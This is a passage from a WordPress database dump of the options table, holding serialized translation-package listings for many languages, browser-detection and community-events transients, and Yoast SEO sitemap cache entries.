09:59:23\";s:12:\"english_name\";s:3:\"Lao\";s:11:\"native_name\";s:21:\"ພາສາລາວ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/lo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lo\";i:2;s:3:\"lao\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"ຕໍ່​ໄປ\";}}s:5:\"lt_LT\";a:8:{s:8:\"language\";s:5:\"lt_LT\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 19:49:17\";s:12:\"english_name\";s:10:\"Lithuanian\";s:11:\"native_name\";s:15:\"Lietuvių kalba\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/lt_LT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lt\";i:2;s:3:\"lit\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Tęsti\";}}s:2:\"lv\";a:8:{s:8:\"language\";s:2:\"lv\";s:7:\"version\";s:5:\"4.7.7\";s:7:\"updated\";s:19:\"2017-03-17 20:40:40\";s:12:\"english_name\";s:7:\"Latvian\";s:11:\"native_name\";s:16:\"Latviešu valoda\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.7/lv.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lv\";i:2;s:3:\"lav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Turpināt\";}}s:5:\"mk_MK\";a:8:{s:8:\"language\";s:5:\"mk_MK\";s:7:\"version\";s:5:\"4.7.7\";s:7:\"updated\";s:19:\"2017-01-26 15:54:41\";s:12:\"english_name\";s:10:\"Macedonian\";s:11:\"native_name\";s:31:\"Македонски јазик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.7/mk_MK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mk\";i:2;s:3:\"mkd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Продолжи\";}}s:5:\"ml_IN\";a:8:{s:8:\"language\";s:5:\"ml_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 03:43:32\";s:12:\"english_name\";s:9:\"Malayalam\";s:11:\"native_name\";s:18:\"മലയാളം\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ml_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ml\";i:2;s:3:\"mal\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"തുടരുക\";}}s:2:\"mn\";a:8:{s:8:\"language\";s:2:\"mn\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-12 07:29:35\";s:12:\"english_name\";s:9:\"Mongolian\";s:11:\"native_name\";s:12:\"Монгол\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/mn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mn\";i:2;s:3:\"mon\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"Үргэлжлүүлэх\";}}s:2:\"mr\";a:8:{s:8:\"language\";s:2:\"mr\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-30 06:25:41\";s:12:\"english_name\";s:7:\"Marathi\";s:11:\"native_name\";s:15:\"मराठी\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/mr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mr\";i:2;s:3:\"mar\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"सुरु ठेवा\";}}s:5:\"ms_MY\";a:8:{s:8:\"language\";s:5:\"ms_MY\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-17 12:44:38\";s:12:\"english_name\";s:5:\"Malay\";s:11:\"native_name\";s:13:\"Bahasa Melayu\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ms_MY.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ms\";i:2;s:3:\"msa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Teruskan\";}}s:5:\"my_MM\";a:8:{s:8:\"language\";s:5:\"my_MM\";s:7:\"version\";s:6:\"4.1.20\";s:7:\"updated\";s:19:\"2015-03-26 15:57:42\";s:12:\"english_name\";s:17:\"Myanmar (Burmese)\";s:11:\"native_name\";s:15:\"ဗမာစာ\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.1.20/my_MM.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"my\";i:2;s:3:\"mya\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:54:\"ဆက်လက်လုပ်ဆောင်ပါ။\";}}s:5:\"nb_NO\";a:8:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-08-02 21:02:39\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/nb_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nb\";i:2;s:3:\"nob\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsett\";}}s:5:\"ne_NP\";a:8:{s:8:\"language\";s:5:\"ne_NP\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-05 06:45:20\";s:12:\"english_name\";s:6:\"Nepali\";s:11:\"native_name\";s:18:\"नेपाली\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ne_NP.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ne\";i:2;s:3:\"nep\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:43:\"जारी राख्नुहोस्\";}}s:5:\"nl_NL\";a:8:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 11:56:12\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/nl_NL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nl_BE\";a:8:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-16 17:21:51\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/nl_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:12:\"nl_NL_formal\";a:8:{s:8:\"language\";s:12:\"nl_NL_formal\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 11:57:39\";s:12:\"english_name\";s:14:\"Dutch (Formal)\";s:11:\"native_name\";s:20:\"Nederlands (Formeel)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/4.8.3/nl_NL_formal.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nn_NO\";a:8:{s:8:\"language\";s:5:\"nn_NO\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-25 10:02:16\";s:12:\"english_name\";s:19:\"Norwegian (Nynorsk)\";s:11:\"native_name\";s:13:\"Norsk nynorsk\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/nn_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nn\";i:2;s:3:\"nno\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Hald fram\";}}s:3:\"oci\";a:8:{s:8:\"language\";s:3:\"oci\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-08-25 10:03:08\";s:12:\"english_name\";s:7:\"Occitan\";s:11:\"native_name\";s:7:\"Occitan\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.8.3/oci.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"oc\";i:2;s:3:\"oci\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Contunhar\";}}s:5:\"pa_IN\";a:8:{s:8:\"language\";s:5:\"pa_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-16 05:19:43\";s:12:\"english_name\";s:7:\"Punjabi\";s:11:\"native_name\";s:18:\"ਪੰਜਾਬੀ\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/pa_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pa\";i:2;s:3:\"pan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"ਜਾਰੀ ਰੱਖੋ\";}}s:5:\"pl_PL\";a:8:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-20 08:02:58\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Kontynuuj\";}}s:2:\"ps\";a:8:{s:8:\"language\";s:2:\"ps\";s:7:\"version\";s:6:\"4.1.20\";s:7:\"updated\";s:19:\"2015-03-29 22:19:48\";s:12:\"english_name\";s:6:\"Pashto\";s:11:\"native_name\";s:8:\"پښتو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1.20/ps.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ps\";i:2;s:3:\"pus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"دوام ورکړه\";}}s:5:\"pt_BR\";a:8:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 13:10:35\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/pt_BR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pt\";i:2;s:3:\"por\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:10:\"pt_PT_ao90\";a:8:{s:8:\"language\";s:10:\"pt_PT_ao90\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-29 08:57:23\";s:12:\"english_name\";s:27:\"Portuguese (Portugal, AO90)\";s:11:\"native_name\";s:17:\"Português (AO90)\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/translation/core/4.8.3/pt_PT_ao90.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_PT\";a:8:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-22 18:42:30\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/pt_PT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:3:\"rhg\";a:8:{s:8:\"language\";s:3:\"rhg\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-16 13:03:18\";s:12:\"english_name\";s:8:\"Rohingya\";s:11:\"native_name\";s:8:\"Ruáinga\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/rhg.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"rhg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:0:\"\";}}s:5:\"ro_RO\";a:8:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-11 07:32:16\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ro_RO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ro\";i:2;s:3:\"ron\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuă\";}}s:5:\"ru_RU\";a:8:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-05 14:14:27\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продолжить\";}}s:3:\"sah\";a:8:{s:8:\"language\";s:3:\"sah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-21 02:06:41\";s:12:\"english_name\";s:5:\"Sakha\";s:11:\"native_name\";s:14:\"Сахалыы\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/sah.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"sah\";i:3;s:3:\"sah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Салҕаа\";}}s:5:\"si_LK\";a:8:{s:8:\"language\";s:5:\"si_LK\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 06:00:52\";s:12:\"english_name\";s:7:\"Sinhala\";s:11:\"native_name\";s:15:\"සිංහල\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/si_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"si\";i:2;s:3:\"sin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:44:\"දිගටම කරගෙන යන්න\";}}s:5:\"sk_SK\";a:8:{s:8:\"language\";s:5:\"sk_SK\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-29 12:16:07\";s:12:\"english_name\";s:6:\"Slovak\";s:11:\"native_name\";s:11:\"Slovenčina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/sk_SK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sk\";i:2;s:3:\"slk\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Pokračovať\";}}s:5:\"sl_SI\";a:8:{s:8:\"language\";s:5:\"sl_SI\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-16 18:45:50\";s:12:\"english_name\";s:9:\"Slovenian\";s:11:\"native_name\";s:13:\"Slovenščina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/sl_SI.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sl\";i:2;s:3:\"slv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Nadaljuj\";}}s:2:\"sq\";a:8:{s:8:\"language\";s:2:\"sq\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-07 10:21:58\";s:12:\"english_name\";s:8:\"Albanian\";s:11:\"native_name\";s:5:\"Shqip\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/sq.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sq\";i:2;s:3:\"sqi\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Vazhdo\";}}s:5:\"sr_RS\";a:8:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-28 12:07:44\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/sr_RS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sr\";i:2;s:3:\"srp\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Настави\";}}s:5:\"sv_SE\";a:8:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-16 14:19:30\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/sv_SE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sv\";i:2;s:3:\"swe\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Fortsätt\";}}s:3:\"szl\";a:8:{s:8:\"language\";s:3:\"szl\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-24 19:58:14\";s:12:\"english_name\";s:8:\"Silesian\";s:11:\"native_name\";s:17:\"Ślōnskŏ gŏdka\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/szl.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"szl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:13:\"Kōntynuować\";}}s:5:\"ta_IN\";a:8:{s:8:\"language\";s:5:\"ta_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 03:22:47\";s:12:\"english_name\";s:5:\"Tamil\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ta_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"தொடரவும்\";}}s:2:\"te\";a:8:{s:8:\"language\";s:2:\"te\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-26 15:47:39\";s:12:\"english_name\";s:6:\"Telugu\";s:11:\"native_name\";s:18:\"తెలుగు\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/te.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"te\";i:2;s:3:\"tel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"కొనసాగించు\";}}s:2:\"th\";a:8:{s:8:\"language\";s:2:\"th\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-07 02:08:56\";s:12:\"english_name\";s:4:\"Thai\";s:11:\"native_name\";s:9:\"ไทย\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/th.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"th\";i:2;s:3:\"tha\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"ต่อไป\";}}s:2:\"tl\";a:8:{s:8:\"language\";s:2:\"tl\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-30 02:38:08\";s:12:\"english_name\";s:7:\"Tagalog\";s:11:\"native_name\";s:7:\"Tagalog\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/tl.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tl\";i:2;s:3:\"tgl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Magpatuloy\";}}s:5:\"tr_TR\";a:8:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-13 22:07:36\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/tr_TR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tr\";i:2;s:3:\"tur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Devam\";}}s:5:\"tt_RU\";a:8:{s:8:\"language\";s:5:\"tt_RU\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-20 20:20:50\";s:12:\"english_name\";s:5:\"Tatar\";s:11:\"native_name\";s:19:\"Татар теле\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/tt_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tt\";i:2;s:3:\"tat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"дәвам итү\";}}s:3:\"tah\";a:8:{s:8:\"language\";s:3:\"tah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-06 18:39:39\";s:12:\"english_name\";s:8:\"Tahitian\";s:11:\"native_name\";s:10:\"Reo Tahiti\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/tah.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"ty\";i:2;s:3:\"tah\";i:3;s:3:\"tah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:0:\"\";}}s:5:\"ug_CN\";a:8:{s:8:\"language\";s:5:\"ug_CN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-05 09:23:39\";s:12:\"english_name\";s:6:\"Uighur\";s:11:\"native_name\";s:9:\"Uyƣurqə\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ug_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ug\";i:2;s:3:\"uig\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:26:\"داۋاملاشتۇرۇش\";}}s:2:\"uk\";a:8:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-02 17:05:02\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/uk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uk\";i:2;s:3:\"ukr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продовжити\";}}s:2:\"ur\";a:8:{s:8:\"language\";s:2:\"ur\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 09:15:16\";s:12:\"english_name\";s:4:\"Urdu\";s:11:\"native_name\";s:8:\"اردو\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/ur.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ur\";i:2;s:3:\"urd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"جاری رکھیں\";}}s:5:\"uz_UZ\";a:8:{s:8:\"language\";s:5:\"uz_UZ\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-15 05:40:58\";s:12:\"english_name\";s:5:\"Uzbek\";s:11:\"native_name\";s:11:\"O‘zbekcha\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/uz_UZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uz\";i:2;s:3:\"uzb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Davom etish\";}}s:2:\"vi\";a:8:{s:8:\"language\";s:2:\"vi\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-03 09:08:47\";s:12:\"english_name\";s:10:\"Vietnamese\";s:11:\"native_name\";s:14:\"Tiếng Việt\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/vi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"vi\";i:2;s:3:\"vie\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Tiếp tục\";}}s:5:\"zh_TW\";a:8:{s:8:\"language\";s:5:\"zh_TW\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-12 11:35:05\";s:12:\"english_name\";s:16:\"Chinese (Taiwan)\";s:11:\"native_name\";s:12:\"繁體中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/zh_TW.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}s:5:\"zh_CN\";a:8:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 21:19:35\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/zh_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"继续\";}}s:5:\"zh_HK\";a:8:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 00:37:03\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:16:\"香港中文版	\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/zh_HK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}}','no'),(1855,'_site_transient_timeout_browser_c99fd505b5898ec7d13b183483752241','1512135806','no'),(1856,'_site_transient_browser_c99fd505b5898ec7d13b183483752241','a:10:{s:4:\"name\";s:6:\"Safari\";s:7:\"version\";s:3:\"9.0\";s:8:\"platform\";s:4:\"iPad\";s:10:\"update_url\";s:0:\"\";s:7:\"img_src\";s:0:\"\";s:11:\"img_src_ssl\";s:0:\"\";s:15:\"current_version\";s:0:\"\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:1;}','no'),(1903,'wpseo_sitemap_624_cache_validator','4Hr2x','no'),(1904,'_site_transient_timeout_browser_9b56bc9123e5943b8e99376c93989c32','1512224444','no'),(1905,'_site_transient_browser_9b56bc9123e5943b8e99376c93989c32','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"61.0.3163.100\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(1920,'_site_transient_timeout_community-events-28d8e2923e202babcd5179949478ed29','1511662852','no'),(1921,'_site_transient_community-events-28d8e2923e202babcd5179949478ed29','a:2:{s:8:\"location\";a:1:{s:2:\"ip\";s:13:\"197.149.220.0\";}s:6:\"events\";a:1:{i:0;a:7:{s:4:\"type\";s:8:\"wordcamp\";s:5:\"title\";s:11:\"WordCamp US\";s:3:\"url\";s:29:\"https://2017.us.wordcamp.org/\";s:6:\"meetup\";s:0:\"\";s:10:\"meetup_url\";s:0:\"\";s:4:\"date\";s:19:\"2017-12-01 00:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:18:\"Nashville, TN, USA\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:36.15660849999999726378518971614539623260498046875;s:9:\"longitude\";d:-86.7784908999999942125214147381484508514404296875;}}}}','no'),(1947,'wpseo_sitemap_395_cache_validator','4BGjW','no'),(1980,'wpseo_sitemap_930_cache_validator','422XV','no'),(2101,'wpseo_sitemap_295_cache_validator','4JCAb','no'),(2102,'wpseo_sitemap_578_cache_validator','4JCAX','no'),(2103,'wpseo_sitemap_300_cache_validator','4JCBl','no'),(2104,'wpseo_sitemap_289_cache_validator','4JCBJ','no'),(2105,'wpseo_sitemap_post_format_cache_validator','4JCCn','no'),(2106,'wpseo_sitemap_284_cache_validator','4JCCF','no'),(2107,'wpseo_sitemap_278_cache_validator','4JCCU','no'),(2108,'wpseo_sitemap_272_cache_validator','4JCD9','no'),(2109,'wpseo_sitemap_266_cache_validator','4JCDr','no'),(2110,'wpseo_sitemap_258_cache_validator','4JCDF','no'),(2111,'wpseo_sitemap_252_cache_validator','4JCDT','no'),(2112,'wpseo_sitemap_249_cache_validator','4JCE8','no'),(2113,'wpseo_sitemap_246_cache_validator','4JCEm','no'),(2114,'wpseo_sitemap_240_cache_validator','4JCEA','no'),(2115,'wpseo_sitemap_312_cache_validator','4JCEP','no'),(2116,'wpseo_sitemap_306_cache_validator','4JCF4','no'),(2117,'wpseo_sitemap_255_cache_validator','4JCFh','no'),(2118,'wpseo_sitemap_234_cache_validator','4JCFw','no'),(2119,'wpseo_sitemap_228_cache_validator','4JCFS','no'),(2120,'wpseo_sitemap_222_cache_validator','4JCG7','no'),(2121,'wpseo_sitemap_216_cache_validator','4JCGq','no'),(2122,'wpseo_sitemap_210_cache_validator','4JCGM','no'),(2123,'wpseo_sitemap_198_cache_validator','4JCGZ','no'),(2124,'wpseo_sitemap_204_cache_validator','4JCHd','no'),(2125,'wpseo_sitemap_193_cache_validator','4JCHq','no'),(2126,'wpseo_sitemap_187_cache_validator','4JC